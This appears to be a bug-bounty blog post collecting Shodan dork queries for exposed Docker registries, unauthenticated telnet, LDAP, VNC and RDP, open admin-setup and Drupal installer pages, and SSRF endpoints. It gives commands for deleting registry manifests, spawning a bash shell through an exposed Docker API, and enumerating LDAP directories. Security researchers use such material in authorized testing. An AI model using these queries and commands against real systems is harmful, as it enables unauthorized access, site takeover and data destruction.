1. DJANGO DROPLET
http.html:"Your Django Droplet"
2. ONEINSTACK
http.html:"Congratulations, OneinStack installed successfully"
3. GITEA INSTALLATION
http.html:"Installation - Gitea: Git with a cup of tea"
http.title:"Installation - Gitea: Git with a cup of tea"
4. DIRECTORY BROWSING MODE
http.title:"directory browsing mode"
5. CANNOT RESOLVE
http.title:"Cannot resolve"
http.html:"Cannot resolve"
6. Exposed Docker Registry API Without Authentication
Some are intentionally public, for others need to test if privilege to modify is possible or not.
"Docker Registry HTTP API" -"UNAUTHORIZED"
#API VERSION CHECK
curl -X GET http://ip:port/v2/
#LIST REPOSITORIES
curl -X GET http://ip:port/v2/_catalog
#TAGS LIST
GET /v2/repository_name_here/tags/list
#DIGEST LIST
GET /v2/<name>/manifests/<tag>
#DELETE REPOSITORY
DELETE /v2/<name>/manifests/<reference>
#PUSHING AN IMAGE
POST /v2/<name>/blobs/uploads/
🪲Exploitation Detailed Reference
Docker Registries and their secrets
Never leave your docker registry publicly exposed! Recently, I have been exploring dockers a lot in search of…logicbomb.medium.com
🪲Exploitation to run cryptocurrency-mining malware https://blog.trendmicro.co.jp/archives/20566
🐞Spawn Interactive Shell
docker -H <host>:<port> ps
docker -H <host>:<port> exec -it <container name> /bin/bash
Docker Hacking: From Shodan to Root
Exploiting Docker Publically exposed API.medium.com
🐞Pentesting Docker Registry by HackTricks
5000 – Pentesting Docker Registry | HackTricks
A storage and distribution system known as a Docker registry is in place for Docker images that are named and may come…book.hacktricks.xyz
📕HackerOne Public Reports
U.S. Dept Of Defense disclosed on HackerOne: Exposed Docker…
Summary:** The docker registry at https://██████ has no authentication in place and is therefore exposed to the public…hackerone.com
Semmle disclosed on HackerOne: Docker Registry HTTP API v2 exposed…
Summary:** Docker Registry HTTP API v2 is exposed in HTTP without authentication. An attacker can use it to dump your…hackerone.com
7. Unauthenticated TELNET
"root@" port:23 -login -password -name -Session
Some of them are honeypots 🪤
8. LDAP
LDAP(Lightweight Directory Access Protocol) Anonymous Null Bind leads to extract sensitive credentials from Active Directory (AD).
"LDAP:"
"LDAP:" "dc="
"LDAP:" "dc=domain,dc=com"
"LDAP:" "NamingContexts"
"LDAP:" "dc=gov"
"LDAP:" "dc=org"
sudo nmap --script=ldap-search.nse X.X.X.X -p 389,636 -Pn
ldapsearch -x -H ldap://<server_ip> -b "DC=domain,DC=com"
9. Unauthenticated RDP/VNC
"authentication disabled" "RFB 003.008"
remote desktop "port:3389"
10. MONGO EXPRESS
"Set-Cookie: mongo-express=" "200 OK"
11. RANSOMWARE COMPROMISED SYSTEMS
Find list of already compromised systems by threat actors by matching for interesting keywords.
"ransomware"
12. DEFAULT PASSWORD
Possibilities to match for juicy keywords are endless. Also try to enter keywords which may lead to direct vulnerability exploitation with ease.
default password
13. GUEST LOGIN
After testing the login auth with default credentials and weak credentials. We can try finding Guest Login feature , and try to test what features are available after it. Proxy everything and start the testing manually using Burpsuite.
http.html:"Login as Guest"
14. REGISTRATION ENDPOINT
While most of the automation tools rely on unauth mass testing, but if we find registration endpoints, we can dive more deep into areas where other hunters don’t like to manually hunt into.
http.html:"Register"
15. CREATE ADMIN ACCOUNT
In most of the cases, we can directly create the admin account and start our exploitation due to unprotected endpoint (Broken Access Control).
http.html:"create admin account"
16. CREATE ADMIN
We are trying to narrow down to pages where these keywords are present in the HTML DOM.
http.html:"admin setup"
http.html:"create admin"
17. DRUPAL TAKEOVER
Install Drupal > Login as Administrator > Takeover the site.
🔴Severity: Critical/High
While in some cases, there are still restrictions in place.
http.html:"Set up database" http.html:"Drupal"
http.title:"Select an installation profile"
Execptional Bug in 5 minutes at @intigriti
About myself:
I am Mahfujur Rahman, and my username is mahfujwhh . I am a Bug bounty Hunter.medium.com
18. SSRF & RCE TESTING ENDPOINT
http.html:"Convert and Upload"
19. SSRF TESTING ENDPOINT
http.html:"Enter URL"
20. SSO Login (Single Sign-On)
http.html:"SSO Login"
http.html:"Login with SSO"
http.html:"Single Sign-On"
Stay tuned for more Shodan dorking articles